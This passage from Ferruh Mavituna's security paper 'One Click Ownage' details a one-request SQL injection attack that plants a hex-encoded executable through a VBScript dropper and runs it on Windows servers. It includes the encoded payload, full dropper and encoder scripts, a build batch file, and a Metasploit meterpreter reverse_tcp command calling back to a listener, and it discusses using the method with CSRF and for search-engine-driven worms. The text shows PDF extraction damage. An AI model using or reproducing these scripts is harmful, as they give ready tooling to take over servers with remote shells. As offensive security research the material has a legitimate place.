C01086C429F880EBE801F0890783C70588D8E2D98DBE0040x028B0709C0743C8B5F048D84300060x0201F35083C708FF962860x0295
8A074708C074DC89F95748F2AE55FF962C60x0209C07407890383C304EBE1FF963C60x028BAE3060x028DBE00F0FFFFBB0010x02505
46A045357FFD58D879F01x0280207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E938ACFFFFx444470x02287
0x165070x025E70x026E70x027E70x028C70x029A70x064B45524E454C33322E444C4Cx024C6F61644C69627261727941x024765745
0726F6341646472657373x025669727475616C50726F74656374x025669727475616C416C6C6F63x025669727475616C46726565x03
4578697450726F63657373xFFx5A":W CreateObject^("Scripting.FileSystemObject"^).GetSpecialFolder^(2^) ^&
"wr.exe", R^(d^):Function R^(t^):Dim Arr^(^):For i=0 To Len^(t^)-1 Step 2:Redim Preserve
Ar^(S^):FB=Mid^(t,i+1,1^):SB=Mid^(t,i+2,1^):HX=FB ^& SB:If FB="x" Then:NB=Mid^(t,i+3,1^):L=H^(SB ^&
NB^):For j=0 To L:Redim Preserve Ar^(S+^(j*2^)+1^):Ar^(S+j^)=0:Ar^(S+j+1^)=0:Next:i=i+1:S=S+L:Else:If
Len^(HX^)^>0 Then:Ar^(S^)=H^(HX^):End If:S=S+1:End If:Next:Redim Preserve Ar^(S-2^):R=Ar:End
Function:Function H^(HX^):H=CLng^("&H" ^& HX^):End Function:Sub W^(FN, Buf^):Dim aBuf:Size =
UBound^(Buf^):ReDim aBuf^(Size2^):For I = 0 To Size - 1 Step
2:aBuf^(I2^)=ChrW^(Buf^(I+1^)*256+Buf^(I^)^):Next:If I=Size Then:aBuf^(I2^)=ChrW^(Buf^(I^)^):End
If:aBuf=Join^(aBuf,""^):Set bS=CreateObject^("ADODB.Stream"^):bS.Type=1:bS.Open:With
CreateObject^("ADODB.Stream"^):.Type=2:.Open:.WriteText aBuf:.Position=2:.CopyTo bS:.Close:End
With:bS.SaveToFile FN,2:bS.Close:Set bS=Nothing:End Sub>p.vbs && p.vbs && %TEMP%wr.exe'
After this point, to change the shell.exe would be just creating a new hex string with BuildText.vbs.
O THER IMPLICATION OF THE ATTACK
CSRF
Since it's only one request, this attack can simply combined with CSRF attacks. If there is an SQL Injection in
admin interface and if it's vulnerable to CSRF as well an attacker can carry out a successful CSRF attack which
will spawn a reverse shell. This wasn't possible before this attack.
W ORMS & G OOGLE D RIVEN A TTACKS
In 2008 hundreds of thousands web application hacked due to mass SQL Injection attacks. A similar attack with
a bigger effect can be carried out with this one request attack, this behaviour and easy exploitation also makes
it a suitable candidate for a worm, which can drop a trojan to all attacked systems and then start searching for
new victims via Google or another search engine.
A PPENDIX – S CRIPTS
[ C 1] - B U IL D T E XT . V BS
'FM - 14/02/09
'Generate a zipped hex representation of a binary file
Set objArgs = WScript.Arguments
If objArgs.Count < 2 Then
Wscript.stdout.write "Usage:" & vbNewline
Wscript.stdout.write "-------------------------------" & vbNewline
Wscript.stdout.write "BuildText.vbs inputfile outputfile" & vbNewline
Wscript.stdout.write "input : binary file" & vbNewline
Wscript.stdout.write "output : text file (will be overwritten)" & vbNewline
Wscript.Quit 1
End If
input = objArgs(0)
output = objArgs(1)
4 Ferruh Mavituna, One Click Ownage
5. BinaryText = ReadBinaryFile(input)
WriteFile output, "d=""" & Optimise(ByteArray2Text(BinaryText)) & """"
'Simply zip the 0s
Function Optimise(binary)
For i=0 To Len(binary) Step 2
Current = Mid(binary,i+1,2)
Out = Current
If Current = "00" Then
NextBit = "00"
repeat = 0
While NextBit = "00" AND repeat < 255
repeat = repeat + 1
NextBit = Mid(binary,i+1+(repeat*2),2)
Wend
If repeat > 1 Then
Out = "x" & Right("0" & Hex(repeat),2)
'Fix the normal loop position
i = i+(repeat*2)-2
End If
End If
OutTxt = OutTxt & Out
Next
Optimise = OutTxt
End Function
Function ByteArray2Text(varByteArray)
strData = ""
strBuffer = ""
HexS = ""
For lngCounter = 0 to UBound(varByteArray)
HexS = Hex(Ascb(Midb(varByteArray,lngCounter + 1, 1)))
If Len(HexS) < 2 Then HexS = "0" & HexS
strBuffer = strBuffer & HexS
'Keep strBuffer at 1k bytes maximum // REMOVABLE?
If lngCounter Mod 1000 = 0 Then
strData = strData & strBuffer
strBuffer = ""
End If
Next
ByteArray2Text = strData & strBuffer
End Function
Function ReadBinaryFile(FileName)
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = 1 'BinaryType
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
End Function
Sub WriteFile(file, text)
Set myFSO = CreateObject("Scripting.FileSystemObject")
5 Ferruh Mavituna, One Click Ownage
6. Set WriteStuff = myFSO.OpenTextFile(file, 2, True)
WriteStuff.Writeline(text)
WriteStuff.Close
SET WriteStuff = NOTHING
SET myFSO = NOTHING
End Sub
[ C 2] - G ENE R A TE B IN A R Y . V BS
W CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "wr.exe", R(d)
Function R(t)
Dim Arr()
For i=0 To Len(t)-1 Step 2
Redim Preserve Ar(S)
FB=Mid(t,i+1,1)
SB=Mid(t,i+2,1)
HX=FB & SB
If FB="x" Then
NB=Mid(t,i+3,1)
L=H(SB & NB)
For j=0 To L
Redim Preserve Ar(S+(j*2)+1)
Ar(S+j)=0
Ar(S+j+1)=0
Next
i=i+1
S=S+L
Else
If Len(HX)>0 Then
Ar(S)=H(HX)
End If
S=S+1
End If
Next
Redim Preserve Ar(S-2)
R=Ar
End Function
Function H(HX)
H=CLng("&H" & HX)
End Function
Sub W(FN, Buf)
Dim aBuf
Size = UBound(Buf): ReDim aBuf(Size2)
For I = 0 To Size - 1 Step 2
aBuf(I2)=ChrW(Buf(I+1)*256+Buf(I))
Next
If I=Size Then
aBuf(I2)=ChrW(Buf(I))
End If
aBuf=Join(aBuf,"")
Set bS=CreateObject("ADODB.Stream")
bS.Type=1:bS.Open
With CreateObject("ADODB.Stream")
6 Ferruh Mavituna, One Click Ownage
7. .Type=2:.Open:.WriteText aBuf
.Position=2:.CopyTo bS:.Close
End With
bS.SaveToFile FN,2:bS.Close
Set bS=Nothing
End Sub
[ C 3] - B U IL D A L L . BA T
@echo off
echo Building Text Representation of Binary
BuildText.vbs Shell.exe Shell.txt
echo Generating New Payload Script
type GenerateBinary.vbs > _temp.tmp
type Shell.txt > GenerateBinary-Generated.vbs
type _temp.tmp >> GenerateBinary-Generated.vbs
del _temp.tmp
echo Packing the payload script
VbPacker GenerateBinary-Generated.vbs GenerateBinary-Generated.packed.vbs
echo Done!
PAUSE
[ C 4] G E NE RA TE S HE LL . BA T
Generating a metasploit meterpreter shell
"C:Program FilesMetasploitFramework3binruby.exe"
C:UsersyouruserAppDataLocalmsf32msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=6666 X >
Shell.exe
upx -9 Shell.exe
Echo Done!
PAUSE
7 Ferruh Mavituna, One Click Ownage